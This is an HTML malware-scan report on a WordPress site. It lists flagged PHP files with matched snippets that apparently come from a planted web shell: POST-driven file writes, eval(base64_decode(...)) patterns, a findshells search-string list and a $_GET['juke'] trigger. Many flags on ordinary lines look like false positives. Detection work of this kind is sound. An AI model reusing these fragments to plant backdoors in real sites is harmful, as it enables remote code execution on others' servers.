Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_73").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/skCBie1KIjr.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:12:34</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_74" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
